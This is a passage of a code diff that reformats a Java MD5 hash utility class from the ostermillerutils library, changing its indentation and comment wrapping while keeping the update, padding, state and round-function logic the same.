+    MD5 md5 = new MD5();
+    md5.update(s, enc);
+    return md5.getHashString();
+  }
+
+  /**
+   * Reset the MD5 sum to its initial state.
+   *
+   * @since ostermillerutils 1.00.00
+   */
+  public void reset() {
+    workingState.reset();
+    finalState.valid = false;
+  }
+
+  /**
+   * Returns 32-character hex representation of this hash.
+   *
+   * @return String representation of this object's hash.
+   * @since ostermillerutils 1.00.00
+   */
+  @Override
+  public String toString() {
+    return getHashString();
+  }
+
+  /**
+   * Update this hash with the given data.
+   *
+   * <p>A state may be passed into this method so that we can add padding and finalize a md5 hash
+   * without limiting our ability to update more data later.
+   *
+   * <p>If length bytes are not available to be hashed, as many bytes as possible will be hashed.
+   *
+   * @param state Which state is updated.
+   * @param buffer Array of bytes to be hashed.
+   * @param offset Offset to buffer array.
+   * @param length number of bytes to hash.
+   * @since ostermillerutils 1.00.00
+   */
+  private void update(MD5State state, byte buffer[], int offset, int length) {
+
+    finalState.valid = false;
+
+    // if length goes beyond the end of the buffer, cut it short.
+    if ((length + offset) > buffer.length) {
+      length = buffer.length - offset;
     }
 
-    /**
-     * Gets this hash sum as an array of 16 bytes.
-     *
-     * @return Array of 16 bytes, the hash of all updated bytes.
-     * @since ostermillerutils 1.00.00
-     */
-    public byte[] getHash() {
-        if (!finalState.valid) {
-            finalState.copy(workingState);
-            long bitCount = finalState.bitCount;
-            // Compute the number of left over bits
-            int leftOver = (int) (((bitCount >>> 3)) & 0x3f);
-            // Compute the amount of padding to add based on number of left over bits.
-            int padlen = (leftOver < 56) ? (56 - leftOver) : (120 - leftOver);
-            // add the padding
-            update(finalState, padding, 0, padlen);
-            // add the length (computed before padding was added)
-            update(finalState, encode(bitCount), 0, 8);
-            finalState.valid = true;
-        }
-        // make a copy of the hash before returning it.
-        return encode(finalState.state, 16);
+    // compute number of bytes mod 64
+    // this is what we have sitting in a buffer
+    // that have not been hashed yet
+    int index = (int) (state.bitCount >>> 3) & 0x3f;
+
+    // add the length to the count (translate bytes to bits)
+    state.bitCount += length << 3;
+
+    int partlen = 64 - index;
+
+    int i = 0;
+    if (length >= partlen) {
+      System.arraycopy(buffer, offset, state.buffer, index, partlen);
+      transform(state, decode(state.buffer, 64, 0));
+      for (i = partlen; (i + 63) < length; i += 64) {
+        transform(state, decode(buffer, 64, i));
+      }
+      index = 0;
     }
 
-    /**
-     * Returns 32-character hex representation of this hash.
-     *
-     * @return String representation of this object's hash.
-     * @since ostermillerutils 1.00.00
-     */
-    public String getHashString() {
-        return toHex(this.getHash());
+    // buffer remaining input
+    if (i < length) {
+      for (int start = i; i < length; i++) {
+        state.buffer[index + i - start] = buffer[i + offset];
+      }
     }
+  }
+
+  /**
+   * Update this hash with the given data.
+   *
+   * <p>If length bytes are not available to be hashed, as many bytes as possible will be hashed.
+   *
+   * @param buffer Array of bytes to be hashed.
+   * @param offset Offset to buffer array.
+   * @param length number of bytes to hash.
+   * @since ostermillerutils 1.00.00
+   */
+  public void update(byte buffer[], int offset, int length) {
+    update(workingState, buffer, offset, length);
+  }
+
+  /**
+   * Update this hash with the given data.
+   *
+   * <p>If length bytes are not available to be hashed, as many bytes as possible will be hashed.
+   *
+   * @param buffer Array of bytes to be hashed.
+   * @param length number of bytes to hash.
+   * @since ostermillerutils 1.00.00
+   */
+  public void update(byte buffer[], int length) {
+    update(buffer, 0, length);
+  }
+
+  /**
+   * Update this hash with the given data.
+   *
+   * @param buffer Array of bytes to be hashed.
+   * @since ostermillerutils 1.00.00
+   */
+  public void update(byte buffer[]) {
+    update(buffer, 0, buffer.length);
+  }
+
+  /**
+   * Updates this hash with a single byte.
+   *
+   * @param b byte to be hashed.
+   * @since ostermillerutils 1.00.00
+   */
+  public void update(byte b) {
+    byte buffer[] = new byte[1];
+    buffer[0] = b;
+    update(buffer, 1);
+  }
+
+  /**
+   * Update this hash with a String. The string is converted to bytes using the current platform's
+   * default character encoding.
+   *
+   * @param s String to be hashed.
+   * @since ostermillerutils 1.00.00
+   */
+  public void update(String s) {
+    update(s.getBytes());
+  }
+
+  /**
+   * Update this hash with a String.
+   *
+   * @param s String to be hashed.
+   * @param enc The name of a supported character encoding.
+   * @throws UnsupportedEncodingException If the named encoding is not supported.
+   * @since ostermillerutils 1.00.00
+   */
+  public void update(String s, String enc) throws UnsupportedEncodingException {
+    update(s.getBytes(enc));
+  }
+
+  /**
+   * The current state from which the hash sum can be computed or updated.
+   *
+   * @since ostermillerutils 1.00.00
+   */
+  private MD5State workingState = new MD5State();
+
+  /**
+   * Cached copy of the final MD5 hash sum. This is created when the hash is requested and it is
+   * invalidated when the hash is updated.
+   *
+   * @since ostermillerutils 1.00.00
+   */
+  private MD5State finalState = new MD5State();
+
+  /**
+   * Temporary buffer cached here for performance reasons.
+   *
+   * @since ostermillerutils 1.00.00
+   */
+  private int[] decodeBuffer = new int[16];
+
+  /**
+   * 64 bytes of padding that can be added if the length is not divisible by 64.
+   *
+   * @since ostermillerutils 1.00.00
+   */
+  private static final byte padding[] = {
+    (byte) 0x80,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+    0,
+  };
+
+  /**
+   * Contains internal state of the MD5 class. Passes MD5 test suite as defined in RFC1321.
+   *
+   * @since ostermillerutils 1.00.00
+   */
+  private class MD5State {
 
     /**
-     * Gets the MD5 hash of the given byte array.
-     *
-     * @param b byte array for which an MD5 hash is desired.
-     * @return Array of 16 bytes, the hash of all updated bytes.
-     * @since ostermillerutils 1.00.00
-     */
-    public static byte[] getHash(byte[] b) {
-        MD5 md5 = new MD5();
-        md5.update(b);
-        return md5.getHash();
-    }
-
-    /**
-     * Gets the MD5 hash of the given byte array.
-     *
-     * @param b byte array for which an MD5 hash is desired.
-     * @return 32-character hex representation the data's MD5 hash.
-     * @since ostermillerutils 1.00.00
-     */
-    public static String getHashString(byte[] b) {
-        MD5 md5 = new MD5();
-        md5.update(b);
-        return md5.getHashString();
-    }
-
-    /**
-     * Gets the MD5 hash the data on the given InputStream.
-     *
-     * @param in byte array for which an MD5 hash is desired.
-     * @return Array of 16 bytes, the hash of all updated bytes.
-     * @throws IOException if an I/O error occurs.
-     * @since ostermillerutils 1.00.00
-     */
-    public static byte[] getHash(InputStream in) throws IOException {
-        MD5 md5 = new MD5();
-        byte[] buffer = new byte[1024];
-        int read;
-        while ((read = in.read(buffer)) != -1) {
-            md5.update(buffer, read);
-        }
-        return md5.getHash();
-    }
-
-    /**
-     * Gets the MD5 hash the data on the given InputStream.
-     *
-     * @param in byte array for which an MD5 hash is desired.
-     * @return 32-character hex representation the data's MD5 hash.
-     * @throws IOException if an I/O error occurs.
-     * @since ostermillerutils 1.00.00
-     */
-    public static String getHashString(InputStream in) throws IOException {
-        MD5 md5 = new MD5();
-        byte[] buffer = new byte[1024];
-        int read;
-        while ((read = in.read(buffer)) != -1) {
-            md5.update(buffer, read);
-        }
-        return md5.getHashString();
-    }
-
-    /**
-     * Gets the MD5 hash of the given file.
-     *
-     * @param f file for which an MD5 hash is desired.
-     * @return Array of 16 bytes, the hash of all updated bytes.
-     * @throws IOException if an I/O error occurs.
-     * @since ostermillerutils 1.00.00
-     */
-    public static byte[] getHash(File f) throws IOException {
-        byte[] hash = null;
-        try (InputStream is = new FileInputStream(f)) {
-            hash = getHash(is);
-        }
-        return hash;
-    }
-
-    /**
-     * Gets the MD5 hash of the given file.
-     *
-     * @param f file array for which an MD5 hash is desired.
-     * @return 32-character hex representation the data's MD5 hash.
-     * @throws IOException if an I/O error occurs.
-     * @since ostermillerutils 1.00.00
-     */
-    public static String getHashString(File f) throws IOException {
-        String hash = null;
-        try (InputStream is = new FileInputStream(f)) {
-            hash = getHashString(is);
-        }
-        return hash;
-    }
-
-    /**
-     * Gets the MD5 hash of the given String.
-     * The string is converted to bytes using the current
-     * platform's default character encoding.
-     *
-     * @param s String for which an MD5 hash is desired.
-     * @return Array of 16 bytes, the hash of all updated bytes.
-     * @since ostermillerutils 1.00.00
-     */
-    public static byte[] getHash(String s) {
-        MD5 md5 = new MD5();
-        md5.update(s);
-        return md5.getHash();
-    }
-
-    /**
-     * Gets the MD5 hash of the given String.
-     * The string is converted to bytes using the current
-     * platform's default character encoding.
-     *
-     * @param s String for which an MD5 hash is desired.
-     * @return 32-character hex representation the data's MD5 hash.
-     * @since ostermillerutils 1.00.00
-     */
-    public static String getHashString(String s) {
-        MD5 md5 = new MD5();
-        md5.update(s);
-        return md5.getHashString();
-    }
-
-
-    /**
-     * Gets the MD5 hash of the given String.
-     *
-     * @param s   String for which an MD5 hash is desired.
-     * @param enc The name of a supported character encoding.
-     * @return Array of 16 bytes, the hash of all updated bytes.
-     * @throws UnsupportedEncodingException If the named encoding is not supported.
-     * @since ostermillerutils 1.00.00
-     */
-    public static byte[] getHash(String s, String enc) throws UnsupportedEncodingException {
-        MD5 md5 = new MD5();
-        md5.update(s, enc);
-        return md5.getHash();
-    }
-
-    /**
-     * Gets the MD5 hash of the given String.
-     *
-     * @param s   String for which an MD5 hash is desired.
-     * @param enc The name of a supported character encoding.
-     * @return 32-character hex representation the data's MD5 hash.
-     * @throws UnsupportedEncodingException If the named encoding is not supported.
-     * @since ostermillerutils 1.00.00
-     */
-    public static String getHashString(String s, String enc) throws UnsupportedEncodingException {
-        MD5 md5 = new MD5();
-        md5.update(s, enc);
-        return md5.getHashString();
-    }
-
-
-    /**
-     * Reset the MD5 sum to its initial state.
+     * True if this state is valid.
      *
      * @since ostermillerutils 1.00.00
      */
-    public void reset() {
-        workingState.reset();
-        finalState.valid = false;
-    }
+    private boolean valid = true;
 
     /**
-     * Returns 32-character hex representation of this hash.
-     *
-     * @return String representation of this object's hash.
-     * @since ostermillerutils 1.00.00
-     */
-    @Override
-    public String toString() {
-        return getHashString();
-    }
-
-    /**
-     * Update this hash with the given data.
-     * <p>
-     * A state may be passed into this method so that we can add padding
-     * and finalize a md5 hash without limiting our ability to update
-     * more data later.
-     * <p>
-     * If length bytes are not available to be hashed, as many bytes as
-     * possible will be hashed.
-     *
-     * @param state  Which state is updated.
-     * @param buffer Array of bytes to be hashed.
-     * @param offset Offset to buffer array.
-     * @param length number of bytes to hash.
-     * @since ostermillerutils 1.00.00
-     */
-    private void update(MD5State state, byte buffer[], int offset, int length) {
-
-        finalState.valid = false;
-
-        // if length goes beyond the end of the buffer, cut it short.
-        if ((length + offset) > buffer.length) {
-            length = buffer.length - offset;
-        }
-
-        // compute number of bytes mod 64
-        // this is what we have sitting in a buffer
-        // that have not been hashed yet
-        int index = (int) (state.bitCount >>> 3) & 0x3f;
-
-        // add the length to the count (translate bytes to bits)
-        state.bitCount += length << 3;
-
-        int partlen = 64 - index;
-
-        int i = 0;
-        if (length >= partlen) {
-            System.arraycopy(buffer, offset, state.buffer, index, partlen);
-            transform(state, decode(state.buffer, 64, 0));
-            for (i = partlen; (i + 63) < length; i += 64) {
-                transform(state, decode(buffer, 64, i));
-            }
-            index = 0;
-        }
-
-        // buffer remaining input
-        if (i < length) {
-            for (int start = i; i < length; i++) {
-                state.buffer[index + i - start] = buffer[i + offset];
-            }
-        }
-    }
-
-    /**
-     * Update this hash with the given data.
-     * <p>
-     * If length bytes are not available to be hashed, as many bytes as
-     * possible will be hashed.
-     *
-     * @param buffer Array of bytes to be hashed.
-     * @param offset Offset to buffer array.
-     * @param length number of bytes to hash.
-     * @since ostermillerutils 1.00.00
-     */
-    public void update(byte buffer[], int offset, int length) {
-        update(workingState, buffer, offset, length);
-    }
-
-    /**
-     * Update this hash with the given data.
-     * <p>
-     * If length bytes are not available to be hashed, as many bytes as
-     * possible will be hashed.
-     *
-     * @param buffer Array of bytes to be hashed.
-     * @param length number of bytes to hash.
-     * @since ostermillerutils 1.00.00
-     */
-    public void update(byte buffer[], int length) {
-        update(buffer, 0, length);
-    }
-
-    /**
-     * Update this hash with the given data.
-     *
-     * @param buffer Array of bytes to be hashed.
-     * @since ostermillerutils 1.00.00
-     */
-    public void update(byte buffer[]) {
-        update(buffer, 0, buffer.length);
-    }
-
-    /**
-     * Updates this hash with a single byte.
-     *
-     * @param b byte to be hashed.
-     * @since ostermillerutils 1.00.00
-     */
-    public void update(byte b) {
-        byte buffer[] = new byte[1];
-        buffer[0] = b;
-        update(buffer, 1);
-    }
-
-    /**
-     * Update this hash with a String.
-     * The string is converted to bytes using the current
-     * platform's default character encoding.
-     *
-     * @param s String to be hashed.
-     * @since ostermillerutils 1.00.00
-     */
-    public void update(String s) {
-        update(s.getBytes());
-    }
-
-    /**
-     * Update this hash with a String.
-     *
-     * @param s   String to be hashed.
-     * @param enc The name of a supported character encoding.
-     * @throws UnsupportedEncodingException If the named encoding is not supported.
-     * @since ostermillerutils 1.00.00
-     */
-    public void update(String s, String enc) throws UnsupportedEncodingException {
-        update(s.getBytes(enc));
-    }
-
-    /**
-     * The current state from which the hash sum
-     * can be computed or updated.
+     * Reset to initial state.
      *
      * @since ostermillerutils 1.00.00
      */
-    private MD5State workingState = new MD5State();
+    private void reset() {
+      state[0] = 0x67452301;
+      state[1] = 0xefcdab89;
+      state[2] = 0x98badcfe;
+      state[3] = 0x10325476;
+
+      bitCount = 0;
+    }
 
     /**
-     * Cached copy of the final MD5 hash sum.  This is created when
-     * the hash is requested and it is invalidated when the hash
-     * is updated.
+     * 128-byte state
      *
      * @since ostermillerutils 1.00.00
      */
-    private MD5State finalState = new MD5State();
+    private int state[] = new int[4];
 
     /**
-     * Temporary buffer cached here for performance reasons.
+     * 64-bit count of the number of bits that have been hashed.
      *
      * @since ostermillerutils 1.00.00
      */
-    private int[] decodeBuffer = new int[16];
+    private long bitCount;
 
     /**
-     * 64 bytes of padding that can be added if the length
-     * is not divisible by 64.
+     * 64-byte buffer (512 bits) for storing to-be-hashed characters
      *
      * @since ostermillerutils 1.00.00
      */
-    private static final byte padding[] = {
-            (byte) 0x80, 0, 0, 0, 0, 0, 0, 0,
-            0, 0, 0, 0, 0, 0, 0, 0,
-            0, 0, 0, 0, 0, 0, 0, 0,
-            0, 0, 0, 0, 0, 0, 0, 0,
-            0, 0, 0, 0, 0, 0, 0, 0,
-            0, 0, 0, 0, 0, 0, 0, 0,
-            0, 0, 0, 0, 0, 0, 0, 0,
-            0, 0, 0, 0, 0, 0, 0, 0,
-    };
+    private byte buffer[] = new byte[64];
+
+    private MD5State() {
+      reset();
+    }
 
     /**
-     * Contains internal state of the MD5 class.
-     * Passes MD5 test suite as defined in RFC1321.
+     * Set this state to be exactly the same as some other.
      *
+     * @param from state to copy from.
      * @since ostermillerutils 1.00.00
      */
-    private class MD5State {
-
-        /**
-         * True if this state is valid.
-         *
-         * @since ostermillerutils 1.00.00
-         */
-        private boolean valid = true;
-
-        /**
-         * Reset to initial state.
-         *
-         * @since ostermillerutils 1.00.00
-         */
-        private void reset() {
-            state[0] = 0x67452301;
-            state[1] = 0xefcdab89;
-            state[2] = 0x98badcfe;
-            state[3] = 0x10325476;
-
-            bitCount = 0;
-        }
-
-        /**
-         * 128-byte state
-         *
-         * @since ostermillerutils 1.00.00
-         */
-        private int state[] = new int[4];
-
-        /**
-         * 64-bit count of the number of bits that have been hashed.
-         *
-         * @since ostermillerutils 1.00.00
-         */
-        private long bitCount;
-
-        /**
-         * 64-byte buffer (512 bits) for storing to-be-hashed characters
-         *
-         * @since ostermillerutils 1.00.00
-         */
-        private byte buffer[] = new byte[64];
-
-        private MD5State() {
-            reset();
-        }
-
-        /**
-         * Set this state to be exactly the same as some other.
-         *
-         * @param from state to copy from.
-         * @since ostermillerutils 1.00.00
-         */
-        private void copy(MD5State from) {
-            System.arraycopy(from.buffer, 0, this.buffer, 0, this.buffer.length);
-            System.arraycopy(from.state, 0, this.state, 0, this.state.length);
-            this.valid = from.valid;
-            this.bitCount = from.bitCount;
-        }
+    private void copy(MD5State from) {
+      System.arraycopy(from.buffer, 0, this.buffer, 0, this.buffer.length);
+      System.arraycopy(from.state, 0, this.state, 0, this.state.length);
+      this.valid = from.valid;
+      this.bitCount = from.bitCount;
     }
+  }
 
-
-    /**
-     * Turns array of bytes into string representing each byte as
-     * a two digit unsigned hex number.
-     *
-     * @param hash Array of bytes to convert to hex-string
-     * @return Generated hex string
-     * @since ostermillerutils 1.00.00
-     */
-    private static String toHex(byte hash[]) {
-        StringBuilder buf = new StringBuilder(hash.length * 2);
-        for (byte element : hash) {
-            int intVal = element & 0xff;
-            if (intVal < 0x10) {
-                // append a zero before a one digit hex
-                // number to make it two digits.
-                buf.append("0");
-            }
-            buf.append(Integer.toHexString(intVal));
-        }
-        return buf.toString();
+  /**
+   * Turns array of bytes into string representing each byte as a two digit unsigned hex number.
+   *
+   * @param hash Array of bytes to convert to hex-string
+   * @return Generated hex string
+   * @since ostermillerutils 1.00.00
+   */
+  private static String toHex(byte hash[]) {
+    StringBuilder buf = new StringBuilder(hash.length * 2);
+    for (byte element : hash) {
+      int intVal = element & 0xff;
+      if (intVal < 0x10) {
+        // append a zero before a one digit hex
+        // number to make it two digits.
+        buf.append("0");
+      }
+      buf.append(Integer.toHexString(intVal));
     }
+    return buf.toString();
+  }
 
-    private static int FF(int a, int b, int c, int d, int x, int s, int ac) {
-        a += ((b & c) | (~b & d));
-        a += x;
-        a += ac;
-        //return rotateLeft(a, s) + b;
-        a = (a << s) | (a >>> (32 - s));
-        return a + b;
+  private static int FF(int a, int b, int c, int d, int x, int s, int ac) {
+    a += ((b & c) | (~b & d));
+    a += x;
+    a += ac;
+    // return rotateLeft(a, s) + b;
+    a = (a << s) | (a >>> (32 - s));
+    return a + b;
+  }
+
+  private static int GG(int a, int b, int c, int d, int x, int s, int ac) {
+    a += ((b & d) | (c & ~d));
+    a += x;
+    a += ac;
+    // return rotateLeft(a, s) + b;
+    a = (a << s) | (a >>> (32 - s));
+    return a + b;
+  }
+
+  private static int HH(int a, int b, int c, int d, int x, int s, int ac) {
+    a += (b ^ c ^ d);
+    a += x;
+    a += ac;
+    // return rotateLeft(a, s) + b;
+    a = (a << s) | (a >>> (32 - s));
+    return a + b;
+  }
+
+  private static int II(int a, int b, int c, int d, int x, int s, int ac) {
+    a += (c ^ (b | ~d));
+    a += x;
+    a += ac;
+    // return rotateLeft(a, s) + b;
+    a = (a << s) | (a >>> (32 - s));
+    return a + b;
+  }
+
+  private static byte[] encode(long l) {
+    byte[] out = new byte[8];
+    out[0] = (byte) (l & 0xff);
+    out[1] = (byte) ((l >>> 8) & 0xff);
+    out[2] = (byte) ((l >>> 16) & 0xff);
+    out[3] = (byte) ((l >>> 24) & 0xff);
+    out[4] = (byte) ((l >>> 32) & 0xff);
+    out[5] = (byte) ((l >>> 40) & 0xff);
+    out[6] = (byte) ((l >>> 48) & 0xff);
+    out[7] = (byte) ((l >>> 56) & 0xff);
+    return out;
+  }
+
+  private static byte[] encode(int input[], int len) {
+    byte[] out = new byte[len];
+    int i, j;
+    for (i = j = 0; j < len; i++, j += 4) {
+      out[j] = (byte) (input[i] & 0xff);
+      out[j + 1] = (byte) ((input[i] >>> 8) & 0xff);
+      out[j + 2] = (byte) ((input[i] >>> 16) & 0xff);
+      out[j + 3] = (byte) ((input[i] >>> 24) & 0xff);
     }
+    return out;
+  }
 
-    private static int GG(int a, int b, int c, int d, int x, int s, int ac) {
-        a += ((b & d) | (c & ~d));
-        a += x;
-        a += ac;
-        //return rotateLeft(a, s) + b;
-        a = (a << s) | (a >>> (32 - s));
-        return a + b;
+  private int[] decode(byte buffer[], int len, int offset) {
+    int i, j;
+    for (i = j = 0; j < len; i++, j += 4) {
+      decodeBuffer[i] =
+          ((buffer[j + offset] & 0xff))
+              | (((buffer[j + 1 + offset] & 0xff)) << 8)
+              | (((buffer[j + 2 + offset] & 0xff)) << 16)
+              | (((buffer[j + 3 + offset] & 0xff)) << 24);
     }
+    return decodeBuffer;
+  }
 
-    private static int HH(int a, int b, int c, int d, int x, int s, int ac) {
-        a += (b ^ c ^ d);
-        a += x;
-        a += ac;
-        //return rotateLeft(a, s) + b;
-        a = (a << s) | (a >>> (32 - s));
-        return a + b;
-    }
+  private static void transform(MD5State state, int[] x) {
+    int a = state.state[0];
+    int b = state.state[1];
+    int c = state.state[2];
+    int d = state.state[3];
 
-    private static int II(int a, int b, int c, int d, int x, int s, int ac) {
-        a += (c ^ (b | ~d));
-        a += x;
-        a += ac;
-        //return rotateLeft(a, s) + b;
-        a = (a << s) | (a >>> (32 - s));
-        return a + b;
-    }
+    /* Round 1 */
+    a = FF(a, b, c, d, x[0], 7, 0xd76aa478); /* 1 */
+    d = FF(d, a, b, c, x[1], 12, 0xe8c7b756); /* 2 */
+    c = FF(c, d, a, b, x[2], 17, 0x242070db); /* 3 */
+    b = FF(b, c, d, a, x[3], 22, 0xc1bdceee); /* 4 */
+    a = FF(a, b, c, d, x[4], 7, 0xf57c0faf); /* 5 */
+    d = FF(d, a, b, c, x[5], 12, 0x4787c62a); /* 6 */
+    c = FF(c, d, a, b, x[6], 17, 0xa8304613); /* 7 */
+    b = FF(b, c, d, a, x[7], 22, 0xfd469501); /* 8 */
+    a = FF(a, b, c, d, x[8], 7, 0x698098d8); /* 9 */
+    d = FF(d, a, b, c, x[9], 12, 0x8b44f7af); /* 10 */
+    c = FF(c, d, a, b, x[10], 17, 0xffff5bb1); /* 11 */
+    b = FF(b, c, d, a, x[11], 22, 0x895cd7be); /* 12 */
+    a = FF(a, b, c, d, x[12], 7, 0x6b901122); /* 13 */
+    d = FF(d, a, b, c, x[13], 12, 0xfd987193); /* 14 */
+    c = FF(c, d, a, b, x[14], 17, 0xa679438e); /* 15 */
+    b = FF(b, c, d, a, x[15], 22, 0x49b40821); /* 16 */
 
-    private static byte[] encode(long l) {
-        byte[] out = new byte[8];
-        out[0] = (byte) (l & 0xff);
-        out[1] = (byte) ((l >>> 8) & 0xff);
-        out[2] = (byte) ((l >>> 16) & 0xff);
-        out[3] = (byte) ((l >>> 24) & 0xff);
-        out[4] = (byte) ((l >>> 32) & 0xff);
-        out[5] = (byte) ((l >>> 40) & 0xff);
-        out[6] = (byte) ((l >>> 48) & 0xff);
-        out[7] = (byte) ((l >>> 56) & 0xff);
-        return out;
-    }
+    /* Round 2 */
+    a = GG(a, b, c, d, x[1], 5, 0xf61e2562); /* 17 */
+    d = GG(d, a, b, c, x[6], 9, 0xc040b340); /* 18 */
+    c = GG(c, d, a, b, x[11], 14, 0x265e5a51); /* 19 */
+    b = GG(b, c, d, a, x[0], 20, 0xe9b6c7aa); /* 20 */
+    a = GG(a, b, c, d, x[5], 5, 0xd62f105d); /* 21 */
+    d = GG(d, a, b, c, x[10], 9, 0x02441453); /* 22 */
+    c = GG(c, d, a, b, x[15], 14, 0xd8a1e681); /* 23 */
+    b = GG(b, c, d, a, x[4], 20, 0xe7d3fbc8); /* 24 */
+    a = GG(a, b, c, d, x[9], 5, 0x21e1cde6); /* 25 */
+    d = GG(d, a, b, c, x[14], 9, 0xc33707d6); /* 26 */
+    c = GG(c, d, a, b, x[3], 14, 0xf4d50d87); /* 27 */
+    b = GG(b, c, d, a, x[8], 20, 0x455a14ed); /* 28 */
+    a = GG(a, b, c, d, x[13], 5, 0xa9e3e905); /* 29 */
+    d = GG(d, a, b, c, x[2], 9, 0xfcefa3f8); /* 30 */
+    c = GG(c, d, a, b, x[7], 14, 0x676f02d9); /* 31 */
+    b = GG(b, c, d, a, x[12], 20, 0x8d2a4c8a); /* 32 */
 
-    private static byte[] encode(int input[], int len) {
-        byte[] out = new byte[len];
-        int i, j;
-        for (i = j = 0; j < len; i++, j += 4) {
-            out[j] = (byte) (input[i] & 0xff);
-            out[j + 1] = (byte) ((input[i] >>> 8) & 0xff);
-            out[j + 2] = (byte) ((input[i] >>> 16) & 0xff);
-            out[j + 3] = (byte) ((input[i] >>> 24) & 0xff);
-        }
-        return out;
-    }
+    /* Round 3 */
+    a = HH(a, b, c, d, x[5], 4, 0xfffa3942); /* 33 */
+    d = HH(d, a, b, c, x[8], 11, 0x8771f681); /* 34 */
+    c = HH(c, d, a, b, x[11], 16, 0x6d9d6122); /* 35 */
+    b = HH(b, c, d, a, x[14], 23, 0xfde5380c); /* 36 */
+    a = HH(a, b, c, d, x[1], 4, 0xa4beea44); /* 37 */
+    d = HH(d, a, b, c, x[4], 11, 0x4bdecfa9); /* 38 */
+    c = HH(c, d, a, b, x[7], 16, 0xf6bb4b60); /* 39 */
+    b = HH(b, c, d, a, x[10], 23, 0xbebfbc70); /* 40 */
+    a = HH(a, b, c, d, x[13], 4, 0x289b7ec6); /* 41 */
+    d = HH(d, a, b, c, x[0], 11, 0xeaa127fa); /* 42 */
+    c = HH(c, d, a, b, x[3], 16, 0xd4ef3085); /* 43 */
+    b = HH(b, c, d, a, x[6], 23, 0x04881d05); /* 44 */
+    a = HH(a, b, c, d, x[9], 4, 0xd9d4d039); /* 45 */
+    d = HH(d, a, b, c, x[12], 11, 0xe6db99e5); /* 46 */
+    c = HH(c, d, a, b, x[15], 16, 0x1fa27cf8); /* 47 */
+    b = HH(b, c, d, a, x[2], 23, 0xc4ac5665); /* 48 */
 
-    private int[] decode(byte buffer[], int len, int offset) {
-        int i, j;
-        for (i = j = 0; j < len; i++, j += 4) {
-            decodeBuffer[i] = (
-                    (buffer[j + offset] & 0xff)) |
-                    (((buffer[j + 1 + offset] & 0xff)) << 8) |
-                    (((buffer[j + 2 + offset] & 0xff)) << 16) |
-                    (((buffer[j + 3 + offset] & 0xff)) << 24
-                    );
-        }
-        return decodeBuffer;
-    }
+    /* Round 4 */
+    a = II(a, b, c, d, x[0], 6, 0xf4292244); /* 49 */
+    d = II(d, a, b, c, x[7], 10, 0x432aff97); /* 50 */
+    c = II(c, d, a, b, x[14], 15, 0xab9423a7); /* 51 */
+    b = II(b, c, d, a, x[5], 21, 0xfc93a039); /* 52 */
+    a = II(a, b, c, d, x[12], 6, 0x655b59c3); /* 53 */
+    d = II(d, a, b, c, x[3], 10, 0x8f0ccc92); /* 54 */
+    c = II(c, d, a, b, x[10], 15, 0xffeff47d); /* 55 */
+    b = II(b, c, d, a, x[1], 21, 0x85845dd1); /* 56 */
+    a = II(a, b, c, d, x[8], 6, 0x6fa87e4f); /* 57 */
+    d = II(d, a, b, c, x[15], 10, 0xfe2ce6e0); /* 58 */
+    c = II(c, d, a, b, x[6], 15, 0xa3014314); /* 59 */
+    b = II(b, c, d, a, x[13], 21, 0x4e0811a1); /* 60 */
+    a = II(a, b, c, d, x[4], 6, 0xf7537e82); /* 61 */
+    d = II(d, a, b, c, x[11], 10, 0xbd3af235); /* 62 */
+    c = II(c, d, a, b, x[2], 15, 0x2ad7d2bb); /* 63 */
+    b = II(b, c, d, a, x[9], 21, 0xeb86d391); /* 64 */
 
-    private static void transform(MD5State state, int[] x) {
-        int a = state.state[0];
-        int b = state.state[1];
-        int c = state.state[2];
-        int d = state.state[3];
-
-        /* Round 1 */
-        a = FF(a, b, c, d, x[0], 7, 0xd76aa478); /* 1 */
-        d = FF(d, a, b, c, x[1], 12, 0xe8c7b756); /* 2 */
-        c = FF(c, d, a, b, x[2], 17, 0x242070db); /* 3 */
-        b = FF(b, c, d, a, x[3], 22, 0xc1bdceee); /* 4 */
-        a = FF(a, b, c, d, x[4], 7, 0xf57c0faf); /* 5 */
-        d = FF(d, a, b, c, x[5], 12, 0x4787c62a); /* 6 */
-        c = FF(c, d, a, b, x[6], 17, 0xa8304613); /* 7 */
-        b = FF(b, c, d, a, x[7], 22, 0xfd469501); /* 8 */
-        a = FF(a, b, c, d, x[8], 7, 0x698098d8); /* 9 */
-        d = FF(d, a, b, c, x[9], 12, 0x8b44f7af); /* 10 */
-        c = FF(c, d, a, b, x[10], 17, 0xffff5bb1); /* 11 */
-        b = FF(b, c, d, a, x[11], 22, 0x895cd7be); /* 12 */
-        a = FF(a, b, c, d, x[12], 7, 0x6b901122); /* 13 */
-        d = FF(d, a, b, c, x[13], 12, 0xfd987193); /* 14 */
-        c = FF(c, d, a, b, x[14], 17, 0xa679438e); /* 15 */
-        b = FF(b, c, d, a, x[15], 22, 0x49b40821); /* 16 */
-
-        /* Round 2 */
-        a = GG(a, b, c, d, x[1], 5, 0xf61e2562); /* 17 */
-        d = GG(d, a, b, c, x[6], 9, 0xc040b340); /* 18 */
-        c = GG(c, d, a, b, x[11], 14, 0x265e5a51); /* 19 */
-        b = GG(b, c, d, a, x[0], 20, 0xe9b6c7aa); /* 20 */
-        a = GG(a, b, c, d, x[5], 5, 0xd62f105d); /* 21 */
-        d = GG(d, a, b, c, x[10], 9, 0x02441453); /* 22 */
-        c = GG(c, d, a, b, x[15], 14, 0xd8a1e681); /* 23 */
-        b = GG(b, c, d, a, x[4], 20, 0xe7d3fbc8); /* 24 */
-        a = GG(a, b, c, d, x[9], 5, 0x21e1cde6); /* 25 */
-        d = GG(d, a, b, c, x[14], 9, 0xc33707d6); /* 26 */
-        c = GG(c, d, a, b, x[3], 14, 0xf4d50d87); /* 27 */
-        b = GG(b, c, d, a, x[8], 20, 0x455a14ed); /* 28 */
-        a = GG(a, b, c, d, x[13], 5, 0xa9e3e905); /* 29 */
-        d = GG(d, a, b, c, x[2], 9, 0xfcefa3f8); /* 30 */
-        c = GG(c, d, a, b, x[7], 14, 0x676f02d9); /* 31 */
